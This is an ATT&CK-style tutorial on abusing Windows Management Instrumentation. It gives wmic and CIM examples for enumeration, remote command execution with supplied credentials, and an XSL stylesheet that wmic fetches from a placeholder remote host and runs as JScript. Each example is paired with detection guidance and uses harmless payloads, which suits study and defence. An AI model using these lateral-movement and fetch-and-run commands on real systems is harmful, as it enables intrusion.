T1047: Windows Management Instrumentation

Adversaries may abuse Windows Management Instrumentation (WMI) to achieve code execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. Local access goes through the WMI service (winmgmt); remote access relies on Remote Procedure Call (RPC) and Server Message Block (SMB). Classic WMI remoting is DCOM over RPC: the connection starts at the RPC endpoint mapper on TCP 135 and continues on a dynamically assigned high port. The newer PowerShell CIM cmdlets reach WMI over WinRM (TCP 5985/5986) by default instead.

An adversary can use WMI to interact with local and remote systems and as a means to perform many tactical functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement.

Useful things we can do with wmic (the WMI command-line client), locally and/or against remote hosts. Note that wmic.exe is deprecated since Windows 10 21H1 and recent Windows 11 builds ship it only as an optional Feature on Demand; the PowerShell CIM cmdlets (Get-CimInstance, Invoke-CimMethod) are the supported replacement and query the same WMI classes.

Enumerating locally, we can grab valuable information about the computer system such as Name, Manufacturer, Model, Domain and Description

Environment

Users, Groups

Missing patches
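The enumeration items above (computer system, environment, users and groups, patches) collected into one worked example. This is an added example, not code from the original page; the host name WS01 and the account CORP\admin are hypothetical placeholders.

```powershell
# Added example: local and remote host enumeration with wmic and the CIM cmdlets.
# Hypothetical names: remote host WS01, account CORP\admin. Run from an elevated prompt.

# Computer identity: Name, Manufacturer, Model, Domain, Description (class Win32_ComputerSystem)
wmic computersystem get Name,Manufacturer,Model,Domain,Description

# Environment variables, including per-user ones (class Win32_Environment)
wmic environment get Name,VariableValue,UserName

# Local users and groups (classes Win32_UserAccount / Win32_Group)
wmic useraccount get Name,SID,Disabled,PasswordRequired
wmic group get Name,SID,Domain

# Installed hotfixes (class Win32_QuickFixEngineering). wmic only reports what IS installed;
# "missing patches" comes from diffing this KB list against a patch baseline for the OS build.
wmic qfe get HotFixID,InstalledOn,Description

# The same queries against a remote host over DCOM/RPC (TCP 135 + a dynamic high port).
# /user without /password makes wmic prompt for the password instead of putting it in the
# command line (and therefore in 4688 / Sysmon 1 logs).
wmic /node:WS01 /user:CORP\admin computersystem get Name,Domain,Model
wmic /node:WS01 /user:CORP\admin qfe get HotFixID,InstalledOn

# Supported equivalent: CIM cmdlets. Remote calls go over WinRM (TCP 5985/5986) by default.
Get-CimInstance Win32_ComputerSystem |
    Select-Object Name, Manufacturer, Model, Domain, Description
Get-CimInstance Win32_QuickFixEngineering -ComputerName WS01 |
    Select-Object HotFixID, InstalledOn
```

The wmic aliases (computersystem, environment, useraccount, group, qfe) are just shorthand for the Win32_* classes named in the comments, which is why the CIM cmdlets can be substituted one for one when wmic.exe is not present on the target.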

Execution of an XSL File

Execution: we can create a process and run arbitrary commands through the Create method of the Win32_Process class, locally or on a remote host
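A worked example of the process-creation primitive, local and remote, with both wmic and the CIM cmdlets. This is an added example, not code from the original page; WS01 and CORP\admin are hypothetical placeholders, and the command run is a harmless marker write rather than a real payload.

```powershell
# Added example: code execution via Win32_Process.Create.
# Hypothetical names: remote host WS01, account CORP\admin.

# Local. The child is spawned by the WMI provider host (WmiPrvSE.exe), not by the shell
# that ran wmic, which is the parent/child relationship defenders key on.
wmic process call create "cmd.exe /c whoami > C:\Windows\Temp\wmi-marker.txt"

# Remote over DCOM. Create does not return the command's output; only ReturnValue and ProcessId
# come back (ReturnValue 0 = success, 2 = access denied, 9 = path not found), so redirect
# output to a file or share as above and collect it afterwards.
wmic /node:WS01 /user:CORP\admin process call create "cmd.exe /c whoami > C:\Windows\Temp\wmi-marker.txt"

# Supported equivalent with the CIM cmdlets, local
$r = Invoke-CimMethod -ClassName Win32_Process -MethodName Create `
        -Arguments @{ CommandLine = 'cmd.exe /c whoami > C:\Windows\Temp\wmi-marker.txt' }
'ReturnValue={0} ProcessId={1}' -f $r.ReturnValue, $r.ProcessId

# Remote through an explicit DCOM session, which matches what wmic does on the wire
# (omit -SessionOption to use WinRM instead)
$opt = New-CimSessionOption -Protocol Dcom
$s   = New-CimSession -ComputerName WS01 -Credential (Get-Credential 'CORP\admin') -SessionOption $opt
Invoke-CimMethod -CimSession $s -ClassName Win32_Process -MethodName Create `
        -Arguments @{ CommandLine = 'cmd.exe /c whoami > C:\Windows\Temp\wmi-marker.txt' }
Remove-CimSession $s
```

On the detection side this is far from silent: Security event 4688 (with command-line auditing enabled) and Sysmon event 1 both record the new process with WmiPrvSE.exe as its parent, and the Microsoft-Windows-WMI-Activity/Operational log records the remote Create call itself.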

wmic is proxy aware, so the /format switch can also be pointed at an XSL file hosted on a remote server, which lets the payload run without the XSL ever being written to disk on the target. This technique (catalogued separately in ATT&CK as T1220, XSL Script Processing) has historically been under-monitored because it is rare in legitimate use, but it is not log-free: process creation auditing records the wmic.exe command line with the /format switch, the script's children are spawned with wmic.exe as their parent, and the fetch of the remote XSL is an outbound connection from wmic.exe. Treat it as lower-noise than PowerShell, not as OPSEC safe.
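A worked example of the XSL execution path, local file and remote URL, followed by the check a defender would run for it. This is an added example, not code from the original page; the file path C:\Users\Public\run.xsl and the URL http://192.0.2.10/run.xsl are hypothetical placeholders (192.0.2.0/24 is a documentation range), and the embedded JScript only launches calc.exe.

```powershell
# Added example: wmic /format: loading an XSL stylesheet that carries JScript.
# Hypothetical placeholders: C:\Users\Public\run.xsl and http://192.0.2.10/run.xsl.

# The stylesheet. The ms:script block is executed by the XSLT engine inside wmic.exe's own
# process, so no separate script host (wscript/cscript) appears.
$xsl = @'
<?xml version="1.0"?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
            xmlns:ms="urn:schemas-microsoft-com:xslt"
            xmlns:user="placeholder" version="1.0">
  <output method="text"/>
  <ms:script implements-prefix="user" language="JScript">
  <![CDATA[
    // Harmless demonstration payload
    var sh = new ActiveXObject("WScript.Shell");
    sh.Run("calc.exe");
  ]]>
  </ms:script>
</stylesheet>
'@
Set-Content -Path 'C:\Users\Public\run.xsl' -Value $xsl -Encoding ASCII

# Local file. The 'os get' query is a dummy; /format is what loads and runs the stylesheet.
wmic os get /format:"C:\Users\Public\run.xsl"

# Remote file. wmic fetches the URL through WinHTTP and honours the system proxy settings,
# so this works from a proxied corporate network and leaves no XSL on disk.
wmic os get /format:"http://192.0.2.10/run.xsl"

# Defender check: hunt 4688 process-creation events whose command line uses wmic /format.
# Requires "Include command line in process creation events" to be enabled in audit policy.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 500 |
    Where-Object { $_.Message -match 'wmic\.exe.*/format:' } |
    Select-Object TimeCreated, Message
```

The artefacts to expect are the wmic.exe command line containing /format: with a .xsl path or URL, an outbound connection from wmic.exe to the payload host (Sysmon event 3), and any child process (calc.exe here) whose parent image is wmic.exe. A wmic.exe process that makes a network connection at all is already anomalous on most hosts and is a cheap high-signal detection for this technique.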
